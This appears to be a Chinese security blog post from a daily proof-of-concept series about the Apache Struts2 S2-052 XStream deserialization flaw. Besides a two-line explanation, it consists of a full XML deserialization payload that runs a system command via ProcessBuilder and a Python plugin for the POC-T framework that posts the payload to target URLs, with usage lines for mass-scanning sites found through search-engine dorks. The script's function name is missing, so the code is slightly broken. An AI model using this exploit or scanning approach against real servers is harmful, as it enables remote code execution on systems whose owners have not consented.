首页 > itarticle > 【one poc one day】

【one poc one day】

admin 11月 13, 2020 0

# 0x01

One Poc One Day —— Struts2 052

# 0x02

## 原理

Struts2 REST 插件使用带有 XStream 程序的 XStream Handler 进行未经任何代码过滤的反序列化操作，这可能在反序列化XML payloads时导致远程代码执行。任意攻击者都可以构造恶意的XML内容提升权限。

## Payload

<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><isclass="javax.crypto.CipherInputStream"><cipherclass="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIteratorclass="javax.imageio.spi.FilterIterator"><iterclass="javax.imageio.spi.FilterIterator"><iterclass="java.util.Collections$EmptyIterator"/><nextclass="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filterclass="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><nextclass="string">foo</next></serviceIterator><lock/></cipher><inputclass="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>

## Poc

em……一切为了配合POC-T，多多适配Poc，多多积累自己的script。


# -*- coding: utf-8 -*-
# project = https://github.com/yizhimanpadewoniu
# author = am4zing

"""
Struts2 S2-052
影响版本： Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12

Usage:
python POC-T.py -s struts2-s2052 -aG "inurl:login.action" --gproxy "http 127.0.0.1 1080"
python POC-T.py -s struts2-s2052 -aZ "login.action"
python POC-T.py -s struts2-s2052 -iF FILE.txt
"""

import requests

def (url):
    if '://' not in url:
        url = 'http://' + url
    try:
        header = dict()
        header['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
        header['Content-Type'] = "application/xml"
        # header['Accept'] = "*/*"
        header['Connection'] = "close"
        header['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        payload = '''<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><isclass="javax.crypto.CipherInputStream"><cipherclass="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIteratorclass="javax.imageio.spi.FilterIterator"><iterclass="javax.imageio.spi.FilterIterator"><iterclass="java.util.Collections$EmptyIterator"/><nextclass="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filterclass="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><nextclass="string">foo</next></serviceIterator><lock/></cipher><inputclass="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>'''
        response_data = requests.post(url, data=payload, headers=header)
        if response_data.status_code == 500 or r"java.security.Provider$Service" in response_data.text:
            return '[s2-052]' + url
        else:
            return response_data.text

    except Exception:
        return False